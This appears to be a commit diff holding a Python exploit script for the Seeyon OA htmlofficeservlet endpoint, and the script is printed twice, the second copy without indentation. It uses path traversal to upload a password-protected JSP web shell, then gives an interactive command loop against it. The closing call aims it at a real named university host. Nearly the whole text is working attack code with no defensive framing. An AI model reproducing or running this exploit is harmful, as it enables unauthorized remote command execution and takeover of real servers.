WangYihang · September 19, 2020 12:56
diff --git a/OA-05-A8.py b/OA-05-A8.py
 import sys
 import base64
 import requests
 import string

 STANDARD_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
 CUSTOM_ALPHABET = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'

 def encode(data):
    table = data.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)
    return str(base64.b64encode(data.encode("utf-8")), 'utf-8').translate(table)

 def decode(data):
    table = data.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
    return str(base64.b64decode(data.translate(table)), 'utf-8')

 def md5(data):
    import hashlib
    return hashlib.md5(data.encode("utf-8")).hexdigest()

 def random_string(length=0x10, charset=__import__('string').ascii_letters + __import__('string').digits):
    import random
    return ''.join([random.choice(charset) for _ in range(length)])

 def system(url, password, command):
    url = "{}?pwd={}&cmd={}".format(url, password, command)
    print("Shell: {}".format(url))
    return requests.get(url, params={"pwd": password, "cmd": command}, verify=False).text

 def shell(url, password):
    while True:
        command = input(">>> ").strip()
        if command == "exit":
            break
        print(system(url, password, command))

 def exploit(protocol, host, port, os):
    url = "{}://{}:{}/seeyon/htmlofficeservlet".format(protocol, host, port)
    print("Attacking: {}".format(url))
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
        'Pragma': 'no-cache',
    }
    filename = "{}.jsp".format(random_string(0x10))
    print("Using filename: {}".format(filename))
    if os == "windows":
        path = '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(filename)
    elif os == "linux":
        path = '../../../ApacheJetspeed/webapps/seeyon/{}'.format(filename)
    else:
        print("Unsupported OS: {}".format(os))
        return

    options = [
        ('DBSTEP','DBSTEP'),
        ('OPTION','SAVEASIMG'),
        ('currentUserId','6993007969600000271'),
        ('CREATEDATE','2019-05-20'),
        ('RECORDID','-5505256504423462237'),
        ('originalFileId','1'),
        ('originalCreateDate','2019-05-20'),
        ('FILENAME', path),
        ('needReadFile','false'),
        ('originalCreateDate','1558275164836'),
    ]

    FMsgText = "\r\n".join(["{}={}".format(i[0], encode(i[1])) for i in options]) + "\r\n"
    FError = ""
    password = random_string(0x10)
    print("Using password: {}".format(password))
    FMsgFile = '<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("' + password + '".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(excuteCmd(request.getParameter("cmd")));}else{out.println(":-)");}%>'
    FMsgFileMd5 = md5(FMsgFile)

    FHeader = "".join([
        "DBSTEP V3.0".ljust(16, " "),
        "{}".format(len(FMsgText)).ljust(16, " "),
        "{}".format(len(FError)).ljust(16, " "),
        "{}".format(len(FMsgFile)).ljust(16, " "),
    ])
    assert len(FHeader) == 64

    payload = "{}{}{}{}".format(FHeader, FMsgText, FMsgFile, FMsgFileMd5)
    response = requests.post(url, data=payload, headers=headers, verify=False)
    print(response.status_code)
    shell("{}://{}:{}/seeyon/{}".format(protocol, host, port, filename), password)
    return

 exploit(protocol="http", host="oa.yangtzeu.edu.cn", port=80, os="linux")
	import sys
	import base64
	import requests
	import string

	STANDARD_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
	CUSTOM_ALPHABET = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'

	def encode(data):
	table = data.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)
	return str(base64.b64encode(data.encode("utf-8")), 'utf-8').translate(table)

	def decode(data):
	table = data.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
	return str(base64.b64decode(data.translate(table)), 'utf-8')

	def md5(data):
	import hashlib
	return hashlib.md5(data.encode("utf-8")).hexdigest()

	def random_string(length=0x10, charset=__import__('string').ascii_letters + __import__('string').digits):
	import random
	return ''.join([random.choice(charset) for _ in range(length)])

	def system(url, password, command):
	url = "{}?pwd={}&cmd={}".format(url, password, command)
	print("Shell: {}".format(url))
	return requests.get(url, params={"pwd": password, "cmd": command}, verify=False).text

	def shell(url, password):
	while True:
	command = input(">>> ").strip()
	if command == "exit":
	break
	print(system(url, password, command))

	def exploit(protocol, host, port, os):
	url = "{}://{}:{}/seeyon/htmlofficeservlet".format(protocol, host, port)
	print("Attacking: {}".format(url))
	headers = {
	'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
	'Pragma': 'no-cache',
	}
	filename = "{}.jsp".format(random_string(0x10))
	print("Using filename: {}".format(filename))
	if os == "windows":
	path = '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(filename)
	elif os == "linux":
	path = '../../../ApacheJetspeed/webapps/seeyon/{}'.format(filename)
	else:
	print("Unsupported OS: {}".format(os))
	return

	options = [
	('DBSTEP','DBSTEP'),
	('OPTION','SAVEASIMG'),
	('currentUserId','6993007969600000271'),
	('CREATEDATE','2019-05-20'),
	('RECORDID','-5505256504423462237'),
	('originalFileId','1'),
	('originalCreateDate','2019-05-20'),
	('FILENAME', path),
	('needReadFile','false'),
	('originalCreateDate','1558275164836'),
	]

	FMsgText = "\r\n".join(["{}={}".format(i[0], encode(i[1])) for i in options]) + "\r\n"
	FError = ""
	password = random_string(0x10)
	print("Using password: {}".format(password))
	FMsgFile = '<%@ page language="java" import="java.util.,java.io." pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("' + password + '".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(excuteCmd(request.getParameter("cmd")));}else{out.println(":-)");}%>'
	FMsgFileMd5 = md5(FMsgFile)

	FHeader = "".join([
	"DBSTEP V3.0".ljust(16, " "),
	"{}".format(len(FMsgText)).ljust(16, " "),
	"{}".format(len(FError)).ljust(16, " "),
	"{}".format(len(FMsgFile)).ljust(16, " "),
	])
	assert len(FHeader) == 64

	payload = "{}{}{}{}".format(FHeader, FMsgText, FMsgFile, FMsgFileMd5)
	response = requests.post(url, data=payload, headers=headers, verify=False)
	print(response.status_code)
	shell("{}://{}:{}/seeyon/{}".format(protocol, host, port, filename), password)
	return

	exploit(protocol="http", host="oa.yangtzeu.edu.cn", port=80, os="linux")